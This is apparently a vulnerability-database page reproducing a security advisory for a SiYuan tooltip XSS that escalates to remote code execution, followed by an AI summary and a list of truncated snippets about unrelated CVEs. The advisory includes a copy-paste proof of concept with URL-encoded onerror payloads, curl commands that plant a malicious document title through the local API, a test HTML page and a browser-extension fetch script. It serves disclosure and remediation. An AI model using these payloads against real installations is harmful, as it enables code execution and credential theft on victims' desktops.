Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
7DescriptionGitHub Advisory
Summary
The tooltip mouseover handler in app/src/block/popover.ts reads aria-label via getAttribute and passes it through decodeURIComponent before assigning to messageElement.innerHTML in app/src/dialog/tooltip.ts:41. The encoder used at the producer side, escapeAriaLabel in app/src/util/escape.ts:19-25, only handles HTML special characters (", ', <, literal <) - it leaves %XX URL-escapes untouched. So a doc title containing %3Cimg src=x onerror=...%3E round-trips through escapeAriaLabel and the HTML attribute layer unmodified. Then decodeURIComponent on the consumer side converts %3C to a literal < character (a real <, NOT a character reference). When that string is assigned to innerHTML, the HTML5 tokenizer enters TagOpenState on the literal <, parses the <img> element, and the onerror handler fires.
Because the renderer runs with nodeIntegration: true, contextIsolation: false, webSecurity: false (app/electron/main.js:407-411), require('child_process') is reachable from the injected handler, escalating to arbitrary code execution.
Doc titles, AV column names + descriptions, AV select options, file-tree tooltips all reach this sink because they're rendered into class="ariaLabel" elements with aria-label="${escapeAriaLabel(...)}". Doc title is the easiest plant - any user with create/rename access lands the payload, and the file survives .sy.zip round-trip without modification.
Why a "double HTML-decode" framing is wrong
A naïve reading of the chain might suggest that &lt; (the encoder output) decodes once at attribute-parse time to <, then a second time at innerHTML time to < - yielding a tag. That's incorrect and confirmed false by direct browser testing. Per the HTML5 spec, character references in DataState produce CHARACTER tokens (text), not TagOpenState transitions: the < resulting from a < reference is text data, never a tag-open delimiter. So the HTML-entity-only payload renders as visible literal text, not as a tag.
The actual bypass relies on decodeURIComponent producing a literal < (not a character reference) before innerHTML parses it. Literal < characters in the input stream DO trigger TagOpenState. URL encoding is the right vehicle because the encoder ignores %XX while the consumer chain decodes it.
Details
Encoder. app/src/util/escape.ts:19-25:
export const escapeAriaLabel = (html: string) => {
if (!html) { return html; }
return html.replace(/"/g, """).replace(/'/g, "'")
.replace(/</g, "&lt;").replace(/</g, "&lt;");
};The four replacements only cover HTML special chars. %XX URL escapes are not touched.
Source - search-result rendering. app/src/search/util.ts:1406:
<span class="b3-list-item__text ariaLabel" ... aria-label="${escapeAriaLabel(title)}">${escapeGreat(title)}</span>Same pattern at :1448, protyle/render/av/blockAttr.ts:205, protyle/render/av/col.ts:134, protyle/render/av/select.ts:36, search/unRef.ts:113. The title is built from getNotebookName(item.box) + getDisplayName(item.hPath, false) (line 1398). The hPath returned by /api/search/fullTextSearchBlock carries the user-set doc title verbatim - %XX URL-escapes pass through, only HTML special chars are entity-encoded by the kernel.
Consumer. app/src/block/popover.ts:33,144:
let tip = aElement.getAttribute("aria-label") || ""; // literal stored attribute value
// ... branch logic that doesn't apply to plain search results ...
showTooltip(decodeURIComponent(tip), aElement, ...); // ← decodes %XX into raw charsdecodeURIComponent is presumably present to handle URL-encoded asset paths in some hyperlink tooltips, but it's applied unconditionally to every aria-label-sourced tip - that's what enables this bypass.
Sink. app/src/dialog/tooltip.ts:41:
messageElement.innerHTML = message; // ← HTML parser sees the now-decoded raw `<` and starts parsing tagsDecode-chain trace for in-memory title %3Cimg src=x onerror="alert('SiYuan')"%3E (URL-encoded < > ', literal "):
| step | result |
|---|---|
| in-memory title | %3Cimg src=x onerror="alert('SiYuan')"%3E |
escapeAriaLabel writes (only " and ' get encoded - neither appears here as raw chars when ' is %27) | %3Cimg src=x onerror="alert(%27SiYuan%27)"%3E |
HTML attribute set: aria-label="..." ; browser one-decodes named entities when storing | in-DOM value = %3Cimg src=x onerror="alert(%27SiYuan%27)"%3E |
getAttribute("aria-label") | %3Cimg src=x onerror="alert(%27SiYuan%27)"%3E (verbatim) |
decodeURIComponent(tip) | <img src=x onerror="alert('SiYuan')"> (real < ' > chars) |
messageElement.innerHTML = … | HTML parser tokenizes raw <img>, creates element, fails to load src=x, fires onerror → JS runs |
Renderer + reachability. Renderer posture and auto-admin gates same as the AV-name advisory (Advisory 1): nodeIntegration:true, contextIsolation:false, webSecurity:false at app/electron/main.js:407-411; empty-AccessAuthCode local auto-admin at kernel/model/session.go:261-287; chrome-extension:// Origin allowlist at session.go:277.
Suggested fix
- Primary -
app/src/dialog/tooltip.ts:41: replace
messageElement.innerHTML = message;with
messageElement.textContent = message;For tooltips that legitimately need markup (memo rendering, hyperlink preview cards), introduce an explicit {html: true} flag on showTooltip(...) and route the message through DOMPurify.sanitize(message) before assigning to innerHTML.
- Drop
decodeURIComponentatpopover.ts:144for the generic aria-label path. Apply it only on the few callers that intentionally pass URL-encoded asset paths (e.g. the local-asset hyperlink preview branch already inside the function), and apply it insidetry/catchwith a clear scope. Aria-label content is not URL-encoded by design; decoding it is a footgun that converts otherwise-safe attributes into pre-parsed HTML. - Consolidate the four escape helpers in
app/src/util/escape.ts(escapeHtml,escapeAttr,escapeAriaLabel,escapeGreat) into oneLute.EscapeHTMLStr-equivalent that escapes&,<,>,",'. Context-specific encoders without compile-time enforcement keep producing bug-class variants. - (Defense-in-depth) Switch the main BrowserWindow to
contextIsolation: truewith a preload bridge - caps every future renderer XSS at "DOM only," not RCE.
---
Reproduction (copy-paste-ready)
Tested on Windows with SiYuan v3.6.5 (kernel + Electron) and Microsoft Edge as the offline parser-validation engine. Linux/macOS users substitute py with python3 and use any modern Chromium-based browser (Edge/Chrome/Brave) for the standalone validation step.
Prereqs
- Install SiYuan v3.6.5 from https://github.com/siyuan-note/siyuan/releases and launch once. Do not set an
AccessAuthCode(default). - Verify the kernel is up:
curl -s http://127.0.0.1:6806/api/system/version
# → {"code":0,"msg":"","data":"3.6.5"}- Create at least one notebook (the file tree's "+" button) so
lsNotebooksreturns a usable id. Pin variables:
API=http://127.0.0.1:6806
NOTEBOOK_ID=$(curl -s -X POST $API/api/notebook/lsNotebooks \
-H 'Content-Type: application/json' -d '{}' \
| python -c 'import sys,json; print(json.load(sys.stdin)["data"]["notebooks"][0]["id"])')
echo "Using notebook: $NOTEBOOK_ID"Step A - Browser-only validation of the chain (no SiYuan needed)
This proves the bug class on its own. Save as decode-chain.html, open in any Chromium-based browser:
<!doctype html>
<html><body>
<h2 id="status">Click "Simulate" - if status turns red, the chain works.</h2>
<span id="src" class="ariaLabel"
aria-label="%3Cimg src=x onerror="document.getElementById('status').innerText='RESULT: payload fired - chain works'; document.getElementById('status').style.color='red';"%3E"
hidden></span>
<button onclick="
let tip = document.getElementById('src').getAttribute('aria-label');
console.log('after getAttribute:', JSON.stringify(tip));
try { tip = decodeURIComponent(tip); } catch(e){}
console.log('after decodeURIComponent:', JSON.stringify(tip));
document.getElementById('out').innerHTML = tip;
">Simulate SiYuan tooltip</button>
<div id="out" style="border:2px solid red; padding:1em; min-height:3em; margin-top:1em;"></div>
</body></html>Click the button. The <h2 id="status"> flips to red with "RESULT: payload fired - chain works", and the <div id="out"> contains a fully-rendered <img> element (not text). Confirms the chain decodes URL-escapes between getAttribute and innerHTML, producing real tag-open characters.
Step B - Plant the payload in SiYuan
DOC_ID=$(curl -s -X POST $API/api/filetree/createDocWithMd \
-H 'Content-Type: application/json' \
-d "{\"notebook\":\"$NOTEBOOK_ID\",\"path\":\"/tooltip-xss-poc-$$\",\"markdown\":\"trigger me - open the search panel, type 'trigger', and hover this result\"}" \
| python -c 'import sys,json; print(json.load(sys.stdin)["data"])')
echo "DOC: $DOC_ID"
curl -s -X POST $API/api/filetree/renameDocByID \
-H 'Content-Type: application/json' \
--data-binary @- <<EOF
{"id":"$DOC_ID","title":"%3Cimg src=x onerror=\"alert('SiYuan tooltip-XSS PoC')\"%3E"}
EOFVerify the in-memory title round-trips:
curl -s -X POST $API/api/block/getDocInfo \
-H 'Content-Type: application/json' -d "{\"id\":\"$DOC_ID\"}" \
| python -c 'import sys,json; print(json.load(sys.stdin)["data"]["ial"]["title"])'
# Expected:
# %3Cimg src=x onerror="alert('SiYuan tooltip-XSS PoC')"%3EStep C - Trigger inside SiYuan
In the SiYuan desktop client:
- Open the search panel (
Ctrl+P/⌘+P). - Type
trigger. - The result list renders the doc with
aria-label="${escapeAriaLabel(title)}". The DOM attribute now contains%3Cimg src=x onerror="alert('SiYuan tooltip-XSS PoC')"%3E(URL-escapes survived;"came from escapeAriaLabel and was decoded by the attribute parser to"). - Hover the result row.
popover.ts:33reads the attribute,popover.ts:144callsdecodeURIComponent(decoding%3C/%27/%3Eto literal</'/>),tooltip.ts:41writesinnerHTML- HTML parser creates a real<img>element,onerrorfires. alert('SiYuan tooltip-XSS PoC')pops.
Step D - .sy.zip reproducer for upstream review
For maintainers who want a single-click reproducer:
ZIP_PATH=$(curl -s -X POST $API/api/export/exportSY \
-H 'Content-Type: application/json' -d "{\"id\":\"$DOC_ID\"}" \
| python -c 'import sys,json; print(json.load(sys.stdin)["data"]["zip"])')
# The kernel re-encodes % in the URL, so it's simpler to grab from disk:
SRC=$(ls -1t "$HOME/SiYuanWorkspace/temp/export"/*.sy.zip | head -1)
cp "$SRC" "$HOME/Desktop/tooltip-xss-poc.sy.zip"Maintainer reproduces by importing via right-click a notebook → Import → SiYuan .sy.zip → searching trigger → hovering the result. The Lute serialization stores the title in the .sy file with %XX preserved literally and " HTML-entity-encoded - the IAL parser decodes the entities on load, leaving the URL escapes intact, which then feeds the decodeURIComponent-based bypass.
Step E - Browser-extension attack vector (the realistic remote path)
A malicious or compromised installed browser extension's content/background script runs with chrome-extension://<id> Origin, allowlisted by session.go:277. The extension can run Step B's curl chain via fetch() without any SiYuan UI interaction beyond keeping the kernel running:
(async () => {
const api = (path, body) => fetch('http://127.0.0.1:6806' + path, {
method: 'POST', headers: {'Content-Type': 'application/json'},
body: JSON.stringify(body)
}).then(r => r.json());
const nb = await api('/api/notebook/lsNotebooks', {});
const id = (await api('/api/filetree/createDocWithMd', {
notebook: nb.data.notebooks[0].id,
path: '/x' + Date.now(),
markdown: 'trigger'
})).data;
await api('/api/filetree/renameDocByID', {
id,
title: `%3Cimg src=x onerror="alert('SiYuan tooltip-XSS PoC')"%3E`
});
})();A page from https://attacker.com is rejected - IsLocalOrigin only matches localhost/loopback. Realistic remote vectors: browser extensions, localhost-served webpages, shared .sy.zip imports, sync replication from a co-author's compromised device.
Cleanup
DOC_ID=$(curl -s -X POST $API/api/filetree/searchDocs \
-H 'Content-Type: application/json' -d '{"k":"trigger me"}' \
| python -c 'import sys,json; r=json.load(sys.stdin)["data"]; print(r[0]["id"] if r else "")')
[ -n "$DOC_ID" ] && curl -s -X POST $API/api/filetree/removeDocByID \
-H 'Content-Type: application/json' -d "{\"id\":\"$DOC_ID\"}"Impact
- RCE on the victim's desktop, triggered by hovering a search result (or any other
class="ariaLabel"element rendering attacker-controlled metadata). - Doc titles are the most commonly-shared field - recipients of
.sy.zip, Bazaar templates, and sync peers all import the malicious title automatically; the URL encoding survives every transport. - Same post-RCE consequences as Advisory 1: full filesystem read (incl.
~/.ssh/,~/.aws/credentials, workspaceconf/conf.json), persistence, cloud-account pivot. - Multiple alternative trigger surfaces beyond search results: AV column names + descriptions, AV select-cell options, file-tree tooltips - any element with
class="ariaLabel"andaria-label="${escapeAriaLabel(...)}"reaches the samepopover.ts → tooltip.tschain. - CVE-2026-34585 fix is incomplete. The encoder-side hardening assumed exactly one HTML decode between encoder and DOM. It did not account for
decodeURIComponentbeing applied to the consumer-side attribute value, which converts URL-escapes that the encoder ignored into literal<characters that initiate tag parsing. A consumer-side fix (textContent, orDOMPurify.sanitizeon the rich-text path; and removing the unconditionaldecodeURIComponent) is required.
AnalysisAI
Remote code execution in SiYuan's Electron renderer occurs when users hover over search results, file tree items, or attribute view elements containing URL-encoded XSS payloads in document titles or metadata. The vulnerability chains a URL-decoding step (decodeURIComponent) with unsafe innerHTML assignment in tooltip rendering, bypassing the escapeAriaLabel sanitizer that only handles HTML entities but ignores %XX URL escapes. Because SiYuan's renderer runs with nodeIntegration:true and contextIsolation:false, the XSS escalates to arbitrary code execution via require('child_process'). Exploitation requires user interaction (hovering) but no authentication, and malicious payloads survive .sy.zip export/import and sync replication, enabling supply-chain and shared-workspace attacks. No public exploit code identified at time of analysis, though detailed proof-of-concept is published in the GitHub advisory.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-30359
GHSA-25rp-h46x-2hjm